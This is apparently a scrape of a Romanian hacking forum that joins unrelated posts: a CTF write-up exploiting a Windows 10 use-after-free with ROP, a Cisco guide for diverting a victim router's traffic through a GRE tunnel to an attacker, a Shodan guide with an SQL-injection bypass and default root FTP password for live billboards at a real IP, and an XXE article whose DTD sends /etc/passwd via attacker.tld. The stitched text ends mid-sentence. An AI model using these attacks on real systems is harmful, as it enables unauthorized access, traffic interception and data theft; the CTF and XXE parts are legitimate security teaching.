Leaderboard

Lui Ion nu ii curge scuipat din gura de prost si nu isi pierde vremea pe toate site-urile de petitii online aparute ca ciupercile dupa ploaie. Ion stie ca asa-zisele petitii sunt egale cu 0 si pe cei din legislativ si executiv ii doare fix in 3 litere de astfel de petitii. Ion stie ca pentru a avea efect, astfel de petitii trebuie recunoscute in mod oficial, gen https://petition.parliament.uk/petitions Ion mai si citeste T&C pe site-urile care s-au obosit sa le scrie si intelege ca astfel de mizerii sunt facute exclusiv pentru a colecta adrese de mail valide a prostimii pe anumite nise (destul de pretioase in ziua de azi). Si nu in ultimul rand, Ion stie ca datul de like si share pe Facebook sau retweet sau click pe o "petitie" online este egal cu zero barat si ca trebuie defapt sa exprime acest lucru in mod vocal, in strada. Fiti ca Ion!

Vă salut băieți ,bine v-am găsit; Mă numesc Tudor sint din Republica Moldova am 20 de ani ,vreau ca fiind activ pe aici dînd întrebări și aflînd răspuns să învăt cit mai multe în programare pentru ca sint la un nivel scăzut îmi doresc să progresez. Anterior nu m-am ocupat cu asa ceva și îmi e dificil. Ceva vreme în urmă fiind un simplu hobby am editat pentru echipa de editare RPES (Romanian Pro Evolution Soccer )fiind membru al echipei in fine n-are nici o treabă asta. Îmi doresc ca să învăt și să ne înțelegem, Momentam aș vrea tot de la 0 să învăt ceea ce ține de C; P.S:Vreau să îmi cer iertare înainte poate de greșelile de exprimate ă gîndurilor și felul de a vorbi romana . Va multumesc anticipat

Exploiting a misused C++ shared pointer on Windows 10 In this post I describe a detailed solution to my “winworld” challenge from Insomni’hack CTF Teaser 2017. winworld was a x64 windows binary coded in C++11 and with most of Windows 10 built-in protections enabled, notably AppContainer (through the awesome AppJailLauncher), Control Flow Guard and the recent mitigation policies. These can quickly be verified using Process Hacker (note also the reserved 2TB of CFGBitmap!): The task was running on Windows Server 2016, which as far as the challenge is concerned behaves exactly as Windows 10 and even uses the exact same libraries. The challenge and description (now with the source code) can be found here Logic of the binary: Our theme this year was “rise of the machines”; winworld is about the recent Westworld TV show, and implements a “narrator” interface where you can create robots and humans, configure their behavior, and move them on a map where they interact with each other. The narrator manipulates Person objects, which is a shared class for both “hosts” (robots) and “guests” (humans). Each type is stored in separate list. Each Person object has the following attributes: The narrator exposes the following commands: --[ Welcome to Winworld, park no 1209 ]-- narrator [day 1]$ help Available commands: - new <type> <sex> <name> - clone <id> <new_name> - list <hosts|guests> - info <id> - update <id> <attribute> <value> - friend <add|remove> <id 1> <id 2> - sentence <add|remove> <id> <sentence> - map - move <id> {<l|r|u|d>+} - random_move - next_day - help - prompt <show|hide> - quit narrator [day 1]$ The action happens during calls to move or random_move whenever 2 persons meet. The onEncounter method pointer is called and they interact. Only attack actually has impact on the other Person object: if the attack is successful the other takes damage and possibly dies. Robots can die an infinite number of times but cannot kill humans. Humans only live once and can kill other humans. The next_day feature restores the lives of robots and the health of everyone, but if the object is a dead human, it gets removed from its list. People talk in an automated way using a Markov Chain that is initialized with the full Westworld script and the added sentences, which may incur in fun conversations. Many sentences still don’t quite make sense though, and since the vulnerabilities aren’t in there, I specified it in the description to spare some reversing time (there is already plenty of C++ to reverse…). Vulnerability 1: uninitialized attribute in the Person copy constructor During the Narrator initialization, the map is randomly generated and a specific point is chosen as the “maze center”, special point that when reached under certain conditions, turns a robot into a human. These conditions are that the currently moved Person must be a HOST, have is_conscious set, and there must be a human (GUEST) on the maze center too. First thing is thus to find that point. All randomized data is obtained with rand(), and the seed is initialized with a classic srand(time(NULL)). Therefore the seed can be determined easily by trying a few seconds before and after the local machine time. Once synchronized with the server’s clock, simply replaying the map initialization algorithm in the exploit will finally allow to find the rand() values used to generate the maze center. Coding a simple pathfinding algorithm then allows to walk any person to this position. Robots are initialized with is_conscious = false in the Person::Personconstructor. However the Person::Person *copy* constructor used in the narrator’s clone function forgets to do this initialization! The value will thus be uninitialized and use whatever was already on the heap. It turns out that just cloning a robot is often enough to get is_conscious != 0… but let’s make sure it always is. Sometimes the newly cloned robot will end up on the Low Fragmentation Heap, sometimes not. Best is then to make sure it always ends up on the LFH by cloning 0x10 – number of current Person objets = 6. Let’s clone 6+1 times a person and check in windbg: 0:004> ? winworld!Person::Person Matched: 00007ff7`9b9ee700 winworld!Person::Person (<no parameter info>) Matched: 00007ff7`9b9ee880 winworld!Person::Person (<no parameter info>) Ambiguous symbol error at 'winworld!Person::Person' 0:004> bp 00007ff7`9b9ee880 "r rcx ; g" ; bp winworld!Person::printInfos ; g rcx=0000024a826a3850 rcx=0000024a826800c0 rcx=0000024a82674130 rcx=0000024a82674310 rcx=0000024a82673a50 rcx=0000024a82673910 rcx=0000024a82673d70 Breakpoint 1 hit winworld!Person::printInfos: 00007ff7`9b9f0890 4c8bdc mov r11,rsp 0:000> r rcx rcx=0000024a82673d70 0:000> !heap -x 0000024a826800c0 Entry User Heap Segment Size PrevSize Unused Flags ------------------------------------------------------------------------------------------------------------- 0000024a826800b0 0000024a826800c0 0000024a82610000 0000024a82610000 a0 120 10 busy 0:000> !heap -x 0000024a82673d70 Entry User Heap Segment Size PrevSize Unused Flags ------------------------------------------------------------------------------------------------------------- 0000024a82673d60 0000024a82673d70 0000024a82610000 0000024a828dec10 a0 - 10 LFH;busy Here we see that the first 2 clones aren’t on the LFH, while the remaining ones are. The LFH allocations are randomized, which could add some challenge. However these allocations are randomized using an array of size 0x100 with a position that is incremented modulo 0x100, meaning that if we spray 0x100 elements of the right size, we will come back to the same position and thus get a deterministic behavior. We don’t even need to keep the chunks in memory, so we can simply spray using a command string of size 0x90 (same as Person), which will always initialize the is_conscious attribute for the upcoming clone operation. So now our robot becomes human, and the troubles begin! Note: It seems that by default Visual Studio 2015 enables the /sdl compilation flag, which will actually add a memset to fill the newly allocated Person object with zeros, and thus makes it unexploitable. I disabled it But to be fair, I enabled CFG which isn’t default! Vulnerability 2: misused std::shared_ptr A shared pointer is basically a wrapper around a pointer to an object. It notably adds a reference counter that gets incremented whenever the shared_ptr is associated to a new variable, and decremented when that variable goes out of scope. When the reference counter becomes 0, no more references to the object are supposed to exist anywhere in the program, so it automatically frees it. This is very useful against bugs like Use After Free. It is however still possible to be dumb with these smart pointers… in this challenge, when a robot becomes human, it stays in the robots list (but its is_enable field becomes false so it cannot be used as a robot anymore), and gets inserted into the humans list with the following code: This is very wrong because instead of incrementing the reference counter of the object’s shared_ptr, we instead create a new shared_ptr that points to the same object: When the reference counter of any of the two shared_ptr gets decremented to 0, the object gets freed and since the other shared_ptr is still active, we will get a Use After Free! To do so, we can kill the human-robot using another human. We also have to remove all his friends otherwise the reference counter will not reach 0. Then using the next_dayfunction will free it when it removes the pointer from the guests vector: So now getting RIP should be easy since the object holds a method pointer: spray 0x100 strings of length 0x90 with a fake object – a std::string can also contain null bytes – and then move the dead human-robot left-right so he meets his killer again, and triggers the overwritten onEncountermethod pointer: def craft_person(func_ptr, leak_addr, size): payload = struct.pack("<Q", func_ptr) # func pointer payload += "\x00" * 24 # friends std::vector payload += "\x00" * 24 # sentences std::vector # std::string name payload += struct.pack("<Q", leak_addr) payload += "JUNKJUNK" payload += struct.pack("<Q", size) # size payload += struct.pack("<Q", size) # max_size payload += struct.pack("<I", 1) # type = GUEST payload += struct.pack("<I", 1) # sex payload += "\x01" # is_alive payload += "\x01" # is_conscious payload += "\x01" # is_enabled [...] payload = craft_person(func_ptr=0x4242424242424242, leak_addr=0, size=0) for i in range(0x100): sendline(s, payload) sendline(s, "move h7 lr") Result: 0:004> g (1a00.c68): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ntdll!LdrpValidateUserCallTarget+0xe: 00007ffa`89b164ae 488b14c2 mov rdx,qword ptr [rdx+rax*8] ds:010986ff`08d30908=???????????????? 0:000> ? rax << 9 Evaluate expression: 4774451407313060352 = 42424242`42424200 Control Flow Guard is going to complicate things a bit, but before that we still need to leak one address to defeat ASLR. Leaking the binary base address In the previous code sample we crafted a name std::string of size 0 to prevent the binary from crashing when printing the name. Replacing the pointer and size with valid values will print size bytes at that address, therefore we got our arbitrary read primitive. Now what do we print? There is ASLR everywhere except for the _KUSER_SHARED_DATA at 0x7ffe0000, which doesn’t hold any pointer anymore on Windows 10… Instead of exploiting our UAF with a string we must therefore replace the freed Person object with another object of the same LFH size (0xa0). We don’t have any, but we can check if we could increase the size of one of our vectors instead. Iteratively trying with our std::vector<std::shared_ptr<Person>> friends, we get lucky with 7 to 9 friends: to 9 friends: 0:004> g Breakpoint 0 hit winworld!Person::printInfos: 00007ff7`9b9f0890 4c8bdc mov r11,rsp 0:000> dq rcx 000001cf`94daea60 00007ff7`9b9ef700 000001cf`94d949b0 000001cf`94daea70 000001cf`94d94a20 000001cf`94d94a40 000001cf`94daea80 000001cf`94dac6c0 000001cf`94dac760 000001cf`94daea90 000001cf`94dac780 00736572`6f6c6f44 000001cf`94daeaa0 61742074`73657567 00000000`00000007 000001cf`94daeab0 00000000`0000000f 00000002`00000000 000001cf`94daeac0 00000000`20010001 00000000`00000000 000001cf`94daead0 0000003d`00000020 0000000a`00000004 0:000> !heap -x 000001cf`94d949b0 Entry User Heap Segment Size PrevSize Unused Flags ------------------------------------------------------------------------------------------------------------- 000001cf94d949a0 000001cf94d949b0 000001cf94d30000 000001cf94dafb50 a0 - 10 LFH;busy 0:000> dq 000001cf`94d949b0 000001cf`94d949b0 000001cf`94dfb410 000001cf`94d90ce0 000001cf`94d949c0 000001cf`94dac580 000001cf`94d90800 000001cf`94d949d0 000001cf`94d98f90 000001cf`94d911c0 000001cf`94d949e0 000001cf`94d99030 000001cf`94d912e0 # string pointer 000001cf`94d949f0 000001cf`94db4cf0 000001cf`94d91180 # string size 000001cf`94d94a00 000001cf`94db7e60 000001cf`94d912a0 000001cf`94d94a10 000001cf`94e97c70 000001cf`94d91300 000001cf`94d94a20 7320756f`590a2e73 73696874`20776f68 0:000> dps poi(000001cf`94d949b0+8+0n24*2) L3 000001cf`94d912e0 00007ff7`9b9f7158 winworld!std::_Ref_count<Person>::`vftable' 000001cf`94d912e8 00000001`00000005 000001cf`94d912f0 000001cf`94d99030 The vector now belongs to the same LFH bucket as Person objects. If we spray 0xf0 strings followed by 0x10 7-friends vectors we will be able to leak pointers: to a vtable inside winworld and to the heap. We should be able to actually do that with 0xff strings then 1 friends vector, but there appears to be some allocations happening in between sometimes – and I haven’t debugged what caused it. We don’t control the size though, which is huge, so the binary will inevitably crash! Good thing is that on Windows libraries are randomized only once per boot, as opposed to the heap, stack etc. that are randomized for each process. This is dirty, but since this binary is restarted automatically it isn’t a problem, so we have leaked the binary base and we can reuse it in subsequent connections. Protip: when you develop a Windows exploit, don’t put the binary on the share to your Linux host, this has the nice side effect of forcing randomization of the binary base at each execution! Call it a mitigation if you want Bypassing Control Flow Guard Control Flow Guard (CFG) is Microsoft’s Control Flow Integrity (CFI) measure, which is based on the simple idea that any indirect call must point to the beginning of a function. A call to __guard_check_icall_fptr is inserted before indirect calls: The advantage of CFG is that it can hardly break a legit program (so, no reason not to use it!). However 3 generic weaknesses are apparent in CFG: The set of allowed targets is still huge, compared to a CFI mechanism that verifies the type of function arguments and return values It cannot possibly protect the stack, since return addresses are not function starts. Microsoft will attempt to fix this with Return Flow Guard and future Intel processor support, but this is not enforced yet. If a loaded module isn’t compiled with CFG support, all the addresses within that modules are set as allowed targets in the CFGBitmap. Problems may also arise with JIT. (here the binary and all DLLs support CFG and there is no JIT) While I was writing this challenge an awesome blog post was published about bypassing CFG, that abuses kernel32!RtlCaptureContext (weakness 1). It turns out that j00ru – only person that solved this task, gg! – used it to leak the stack, but I haven’t, and opted for leaking/writing to the stack manually (weakness 2). We have abused the std::string name attribute for arbitrary read already, now we can also use it to achieve arbitrary write! The only requirement is to replace the string with no more bytes than the max size of the currently crafted std::string object, which is therefore no problem at all. This is cool, however so far we don’t even know where the stack (or even heap) is, and it is randomized on each run of the program as opposed to the libraries. We will come back to this later on. First we also want to leak the addresses of the other libraries that we may want to use in our exploit. Leaking other libraries Using the binary base leak and a spray of 0x100 crafted persons strings we have enough to leak arbitrary memory addresses. We can leave the vectors to null bytes to prevent them from crashing during the call to Person::printInfos. Now that we have the binary base address and that it will stay the same until next reboot, leaking the other libraries is trivial: we can just dump entries in the IAT. My exploit makes use of ucrtbase.dll and ntdll.dll(always in the IAT in the presence of CFG), which can be leaked by crafting a std::string that points to the following addresses: 0:000> dps winworld+162e8 L1 00007ff7`9b9f62e8 00007ffa`86d42360 ucrtbase!strtol 0:000> dps winworld+164c0 L2 00007ff7`9b9f64c0 00007ffa`89b164a0 ntdll!LdrpValidateUserCallTarget 00007ff7`9b9f64c8 00007ffa`89b164f0 ntdll!LdrpDispatchUserCallTarget To repeat the leak we can overwrite the onEncounter method pointer with the address of gets(), once we have located the base address of ucrtbase.dll. This is of course because of the special context of the task that has its standard input/output streams redirected to the client socket. This will trigger a nice gets(this_object) heap overflow that we can use to overwrite the name string attribute in a loop. Leaking the stack Where can we find stack pointers? We can find the PEB pointer from ntdll, however in x64 the PEB structure doesn’t hold any pointer to the TEBs (that contains stack pointers) anymore… A recent blogpost from j00ru described an interesting fact: while there is no good reason to store stack pointers on the heap, there may be some leftover stack data that was inadvertently copied to the heap during process initialization. His post describes it on x86, let’s check if we still have stack pointers lurking on the heap in x64: 0:001> !address [...] BaseAddress EndAddress+1 RegionSize Type State Protect Usage -------------------------------------------------------------------------------------------------------------------------- [...] 3b`b6cfb000 3b`b6d00000 0`00005000 MEM_PRIVATE MEM_COMMIT PAGE_READWRITE Stack [~0; 2524.1738] [...] 0:001> !heap Heap Address NT/Segment Heap 17c262d0000 NT Heap 17c26120000 NT Heap 0:001> !address 17c262d0000 Usage: Heap Base Address: 0000017c`262d0000 End Address: 0000017c`26332000 [...] 0:001> .for (r $t0 = 17c`262d0000; @$t0 < 17c`26332000; r $t0 = @$t0 + 8) { .if (poi(@$t0) > 3b`b6cfb000 & poi(@$t0) < 3b`b6d00000) { dps $t0 L1 } } 0000017c`262d2d90 0000003b`b6cff174 0000017c`262deb20 0000003b`b6cffbd8 0000017c`262deb30 0000003b`b6cffbc8 0000017c`262deb80 0000003b`b6cffc30 0000017c`2632cf80 0000003b`b6cff5e0 0000017c`2632cfc0 0000003b`b6cff5e0 0000017c`2632d000 0000003b`b6cff5e0 0000017c`2632d1a0 0000003b`b6cff5e0 0000017c`2632d2c0 0000003b`b6cff5e0 0000017c`2632d4e0 0000003b`b6cff5e0 0000017c`2632d600 0000003b`b6cff5e0 0000017c`2632d660 0000003b`b6cff5e0 0000017c`2632d6e0 0000003b`b6cff5e0 0000017c`2632d700 0000003b`b6cff5e0 0:000> dps winworld+1fbd0 L3 00007ff7`9b9ffbd0 0000017c`2632ca80 00007ff7`9b9ffbd8 0000017c`262da050 00007ff7`9b9ffbe0 0000017c`2632cf20 Yes! We indeed still have stack pointers on the default heap, and we can leak an address from that heap at static offsets from our winworld base address. Now we can just browse heap pages and try to find these stack addresses. In my exploit for simplicity I used a simple heuristic that finds QWORDS that are located below the heap but also above 1`00000000, and interactively ask which one to choose as a stack leak. This can obviously be improved. Next step is to dump the stack until we find the targeted return address, craft our std::string to point to that exact address, and use the “update <id> name ropchain” feature to write a ropchain! Mitigation policies & ROP Now that we have both an arbitrary write and the exact address where we can overwrite a saved RIP on the stack, all that is left is build a ROP chain. Several ideas to do it: VirtualProtect then shellcode LoadLibrary of a library over SMB Execute a shell command (WinExec etc.) Full ROP to read the flag As mentioned earlier the binary has some of the recent mitigation policies in our context the following ones are relevant: ProcessDynamicCodePolicy : prevents inserting new executable memory → VirtualProtect will fail ProcessSignaturePolicy : libraries must be signed → prevents LoadLibrary ProcessImageLoadPolicy : libraries cannot be loaded from a remote location → prevents LoadLibrary over SMB The two last options are still available. I also wanted to add a call to UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_CHILD_PROCESS_POLICY in the parent AppJailLauncherprocess – which would prevent winworld from creating new processes – but since it is a console application, spawning winworld also creates a conhost.exe process. Using this mitigation prevents the creation of the conhost.exe process and therefore the application cannot run. My solution reads the flag directly in the ROP chain. Since I didn’t want to go through all the trouble of CreateFile and Windows handles, I instead used the _sopen_s / _read / puts / _flushall functions located in ucrtbase.dll that have classic POSIX-style file descriptors (aka 0x3). Looking for gadgets in ntdll we can find a perfect gadget that pop the first four registers used in the x64 calling convention. Interestingly the gadget turns out to be in CFG itself, which was a scary surprise while single stepping through the rop chain… 0:000> u ntdll+96470 L5 ntdll!LdrpHandleInvalidUserCallTarget+0x70: 00007ffa`89b16470 5a pop rdx 00007ffa`89b16471 59 pop rcx 00007ffa`89b16472 4158 pop r8 00007ffa`89b16474 4159 pop r9 00007ffa`89b16476 c3 ret Putting it all together we finally get the following: Z:\awe\insomnihack\2017\winworld>python sploit.py getflag remote [+] Discovering the PRNG seed... Clock not synced with server... [+] Resynced clock, delay of -21 seconds [+] Found the maze center: (38, 41) [+] Check the map for people positions [+] Make sure that LFH is enabled for bucket of sizeof(Person) 6 / 6 ... [+] Spray 0x100 std::string to force future initialization of pwnrobot->is_conscious 256 / 256 ... [+] Cloning host, with uninitialized memory this one should have is_conscious... [+] Removing current friends of pwnrobot... [+] Moving a guest to the maze center (37, 86) -> (38, 41)... [+] Moving our host to the maze center (38, 29) -> (38, 41)... [+] pwnrobot should now be a human... kill him! [+] Removing all pwnrobot's friends... 7 / 7 ... [+] Decrement the refcount of pwnrobot's human share_ptr to 0 -> free it [+] Spray 0x100 std::string to trigger UAF 256 / 256 ... [+] heap leak: 0x18a6eae8b40 [+] Leaking stack ptr... [+] Dumping heap @ 0x18a6eae6b40... [+] Dumping heap @ 0x18a6eae7b40... [HEAP] 0x18a6eae7b40 [00] - 0x18a6ea96c72 [01] - 0x18a6ea9c550 [02] - 0x18a6ea9e6e0 Use which qword as stack leak? [+] Dumping heap @ 0x18a6eae8b40... [HEAP] 0x18a6eae8b40 [00] - 0x3ab7faf120 [01] - 0x3ab7faf4f0 [02] - 0x18a6ea9c550 [03] - 0x18a6eae84c0 [04] - 0x18a6eae8560 [05] - 0x18a6eae8760 Use which qword as stack leak? 1 [+] stack @ 0x3ab7faf4f0 [+] Leaking stack content... [-] Haven't found saved RIP on the stack. Increment stack pointer... [-] Haven't found saved RIP on the stack. Increment stack pointer... [-] Haven't found saved RIP on the stack. Increment stack pointer... RIP at offset 0x8 [+] Overwrite stack with ROPchain... [+] Trigger ROP chain... Better not forget to initialize a robot's memory! Flag: INS{I pwn, therefore I am!} [+] Exploit completed. Conclusions You can find the full exploit here . sourca : https://blog.scrt.ch/2017/01/27/exploiting-a-misused-c-shared-pointer-on-windows-10/ thecount.

:))))))))))))) Dezinformare, sunt basist sefu' Hahahahah

Dupa cum spune si titlul, vand servicii de graphic design. Programe folosite: suita adobe Aici puteti vedea cateva din creatiile mele: https://www.facebook.com/alezudesign As dori sa se posteze aici doar feedback-urile. Cererile si intrebarile in privat. Multumesc

O sa urmeze o serie de Tutoriale Cisco. Le voi posta in acest thread. Sa luam un caz concret. La ce va ajuta daca aveti acces la un Router Cisco?! In primul rand, tot traficul va trece prin acel Router, dar cum ati putea intercepta tot acest trafic, avand in vedere ca nu este langa dvs(altfel am folosi direct un wireshark si am rezolva problema)?! Pentru asta exista Gre Tunnel. Ce este acest Gre tunnel? Pai un tunnel Virtual intre 2 routere. Generic Routing Encapsulation - Wikipedia, the free encyclopedia Luam imaginea urmatoare: http://img18.imageshack.us/img18/2343/ciscofun1.jpg Vrem sa trimitem tot traficul victimei catre routerul nostru, astfel incat noi sa putem intercepta tot traficul. Avand acces la routerul victimei configuram astfel routerul: Construim tunnelul Gre pe Routerul Victimei: conf t //intram in interfata de configurare interface tunnel0 //facem interfata virtual de tunnel ip address 192.168.10.1 255.255.255.0 //punem un ip interfetei virtuale tunnel source e0/0 //spunem de unde pleaca traficul tunnel destination 80.179.20.55 //si unde se duce Apoi trebuie sa ii spunem routerului ce informatii sa filtreze: access-list 101 permit tcp any any eq 443 // facem o regula de acces ce trebuie sa filtreze access-list 101 permit tcp any any eq 80 // routereul, am hotarat sa primim informatii doar access-list 101 permit tcp any any eq 21 //daca se primesc pachete pe porturile 80,21,.. access-list 101 permit tcp any any eq 20 access-list 101 permit tcp any any eq 23 access-list 101 permit tcp any any eq 25 access-list 101 permit tcp any any eq 110 Sa va explic a 2a comanda: access-list 101 permit tcp any any eq 80 Prin aceasta ii spunem sa filtreze doar pachetele TCP ce au orice sursa si se duc catre orice destinatie, iar portul destinatie este 80. Aplicam aceasta regula(access-list) pe interfata: router-map divert-traffic // Cream o regula(o regula pentru a fowarda traficul match ip address 101 //Spunem sa filtreze dupa acces-list 101 interface Ethernet0/0 //intram in interfata e0/0 ip policy route-map divert-traffic //aplicam regula pe interfata de iesire catre internet Apoi configuram pe routerul nostrul doar Gre tunnel: Attacker(config)# interface tunnel0 Attacker(config-if)# ip address 192.168.10.2 255.255.255.0 Attacker(config-if)# tunnel source Ethernet0/0 Attacker(config-if)# tunnel destination 21.199.146.242 Tot ce mai trebuie sa facem este sa ascultam traficul cu un wireshark conectat la router.

Step 1. Register to shodan Step 2. Look up: title:"lednet live system" You'll find some! Example: 186.206.188.175:8060/en/main.html How to hack it? Well the Username Parameter is vulnerable to SQL Injection...... So to login, paste -1558" OR 9005=9005 AND "UxGI"="UxGI in the username parameter and anything in the password input. Now click login! Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards.... Username: root Password: 111111 $ ftp 186.206.188.175 Connected to 186.206.188.175. 220 Welcome to blah FTP service. Name (186.206.188.175): root 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd / 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||41314|). 150 Here comes the directory listing. drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d drwxr-xr-x 7 0 0 0 May 21 18:08 dev lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e drwxr-xr-x 1 0 0 748 Jan 01 1970 etc lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f drwxr-xr-x 1 0 0 36 Jan 01 1970 home drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt drwxr-xr-x 1 0 0 0 Jan 01 1970 opt dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc drwxr-xr-x 1 0 0 116 Jan 01 1970 root drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin drwxr-xr-x 12 0 0 0 Jan 01 1970 sys drwxrwxrwt 6 0 0 720 May 21 18:16 tmp drwxr-xr-x 1 0 0 108 Jan 01 1970 usr drwxr-xr-x 3 0 0 672 Jan 01 1970 var drwxr-xr-x 4 0 0 288 Jan 01 1970 www 226 Directory send OK. ftp> Copiat de le HF...

Acum doi ani am făcut un site despre conturi premium dar crezut ca nu va funcționa, azi am văzut ca după atat timp inca mai am lume pe site. Am început sa postez din nou pe el si acum o sa ma țin. http://charged-accounts.blogspot.com

In this article I present some thoughts about generic detection of XML eXternal Entity (XXE) vulnerabilities during manual pentests supplemented with some level of automated tests. The ideas in this blog post (derived from experiences of several typical and untypical XXE detections during blackbox pentests) can easily be transformed into a generic approach to fit into web vulnerability scanners and their extensions. This is done by demonstrating an example of where service endpoints that are used in a non-XML fashion can eventually be accessed with XML as input format too, opening the attack surface for XXE attacks. At the time of writing this article I've started to develop a Burp Extension ("Generic XXE Detector") and will eventually also transform it into a ZAP extension, letting this kind of detection approach make its way into these scanners - if I find the time to complete that. XXE detection in service endpoints During blackbox pentesting one often gets in front of some service endpoints (mostly REST based ones used from within single-page apps in browsers). These RESTful endpoints often offer JSON as transport format, but many server-side development frameworks (like JAX-RS for Java based RESTful services) make it very easy for developers to offer also an XML based data exchange format for input and/or output out-of-the-box. If such alternative formats exist, they can easily be triggered using proper Content-Type request header values (like text/xml or application/xml). So the challenge is to find these endpoints which also accept XML as input format, even though the client (webpage) only uses JSON or direct path- or query-params to access the service. To scale this from a manual pentesting trick into a way of automation, the tool to scan for this needs a generic XXE detection approach, which can easily be applied to every URL the active scanner sees in its scope during a pentest. In one very interesting case of an XXE finding inside a Java based service endpoint (during a blackbox pentest) I came across a service endpoint that only had path- and query-params as input source and responded with JSON. Basically it was even a simple GET based service (no POST there). So this didn't really look much like "let's try some XXE Kung-Fu here...". Especially the tools including Burp didn't find any XXE at this spot when actively scanning it (even with thorough scanning configured). But after several manual tries, I managed to squeeze an XXE out of it, since it indeed was a REST service which also accepted XML out-of-the-box. I had to apply several tricks though, in order to get the XXE to work: I tried to convert the request from a GET to a POST in order to also send XML as the request body. Unfortunately POST was not accepted (as the service was only mapped to GET), so I had to stick to GET requests. I removed the query-params as well as path-params from the request URL in order to not let these get picked up by the service. As this was a blackbox pentest, I can only assume that removing the query-params led towards a mode of the service endpoint accepting the input also via other formats (i.e. when automatically mapped from XML input for example). Accessing the service without the used path- and query-params resulted in an error message (no input data available). Even though only GET could be used, I then added the Content-Type: application/xml request header and some non-conforming invalid XML as the request body: This was rewarded with an XML error message, showing that some kind of parsing process picked up the body payload of the GET request, i.e. making it an interesting target to investigate further. Adding the path- and query-params back to the request resulted in a business error message, so that the exploit seems to require to remove them, as they might take precedence over the XML body otherwise. As I then had a way of letting the server parse my XML and received at least replies with some technical error messages from the parser, I tried to use the XXE to exfiltrate some data (like /etc/passwd or just listing of base directory /): As the expected XML format for this kind of service call was not known to me (blackbox assessment), I had to use a more generic approach, which works even without placing the entity reference in the proper XML element. Also (as tested afterwards) when the server got the XML as expected, it didn't return any dynamic response, so only the technical error was echoed back. Of course the great out-of-band (OOB) exfiltration technique by T.Yunusov and A.Osipov would work as a generic approach to exfiltrate content in such a scenario. But since (at least for current Java environments) this kind of URL-based OOB exfiltration only allowed to exfiltrate contents of files consisting of only one line (as CRLFs break the URL to the attacker's server), I managed to combine it with the technical error message the server replied and read the data from there: The idea is to use the trick of passing the data carrying parameter entity itself into another file:/// entity in order to trigger a file-not-found exception on the second file access with the content of the first file as the name of the second file, which was thankfully echoed back completely from the server as a file-not-found exception (so pure OOB exfiltration wasn't required here): Attacker's DTD part applying a file-not-found exception echo trick (hosted on attacker's server at http://attacker.tld/dtd-part): <!ENTITY % three SYSTEM "file:///etc/passwd"> <!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> Request (exploiting the XXE like in the regular OOB technique by Yunusov & Osipov): GET /service/ HTTP/1.1 Host: example.com:443 Content-Type: application/xml Content-Length: 161 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" > %one; %two; %four; ]> Response (delivering the data as file-not-found error message): HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Type: text/html Content-Length: 1851 Connection: close javax.xml.bind.UnmarshalException - with linked exception: [java.io.FileNotFoundException: /root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin ... ... ... ... ... ... ... ... ... apache:x:54:54:Apache:/var/www:/sbin/nologin (No such file or directory)] Using this file-not-found exception echo trick to read the data not only solved the "one line only" exfiltration problem, it also lifted some restrictions that existed with XXE exploitations when used directly inside the XML elements: Contents of files that contain XML special meta chars (like < or >) would break the XML structure. This is no longer a problem with the above mentioned trick. After that all worked pretty well, I discovered that Ivan Novikov has recently blogged about some pure OOB techniques that even exfiltrate data under Java 1.7+ using the ftp:// scheme and a customized FTP server. This would have worked in the above mentioned scenario as well - even when the server does not return technical error messages, as it is a pure OOB exfiltration trick. As a small side note: This file-not-found exception echo trick might also be used as an XSS in some cases by trying to echo <script>alert(1)</script> as the filename. Often these technical error messages might not be properly escaped when echoed back, compared to situations where non-error-messages originating from regular XML element input will be reflected. But this XSS is rather difficult to exploit in real scenarios, since it would not be easy to trigger the desired request from a victim's browser – if not even impossible depending on the http method (in this example a strange GET with request body). Automating this as a scanning approach Finding such an XXE vulnerability in a service endpoint using only manual pentesting tricks (as the scanners didn't detect it) made me think of a generic approach that is capable of detecting such a vulnerability automatically. Basically the scanning technique should try this on every (in-scope) request it sees, even when the request in question does not contain any XML data (as in the scenario of the RESTful service above that used mainly JSON). So here are the ideas I came up with (which I will also prototype as a Burp and/or ZAP extension soon). The scanner should perform the following steps on every request it is allowed to scan actively. This should be done in addition to any regular XXE detections the scanner already has in place. The following technique is just intended to detect scenarios like the above mentioned: Issue the request with original path- and/or query-params and with the http POST method as well as its original http method (even GET) and place a generic DTD based payload in the request body that directly references the parameter entity, like the following: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///some-non-existing.file" > %xxe; ]>. Don't forget to add the Content-Type: application/xml header to the request (also try with text/xml as well). If the response contains an error like the following (effectively echoing the filename back in some kind of file-not-found message), flag it as potential XXE: javax.xml.bind.UnmarshalException - with linked exception: [java.io.FileNotFoundException: /some-non-existing.file (No such file or directory)] You can also compare the response content of the previous step of accessing a non-existing file with accessing a valid existing file like /etc/passwd. This might catch some differences between the error responses of non-existing files vs. existing files that do not contain valid content to place inside the DTD. If it is also possible to echo in the file-not-found exception message some <script>alert(1)</script> as the filename, flag it as XSS too, but one that is difficult to exploit (and depending on the http method required eventually impossible to exploit). If the steps above didn't trigger an XXE condition, try to remove the original request's query-params and try the above steps again. Finally try to strip each path-param as well (just in case the service is picking this up also and then does not try to access input from the XML body instead) and retry step one. If the steps above didn't trigger an XXE condition, try to use the well-known OOB techniques (see the referenced links above for more details regarding these cool tricks): Use a 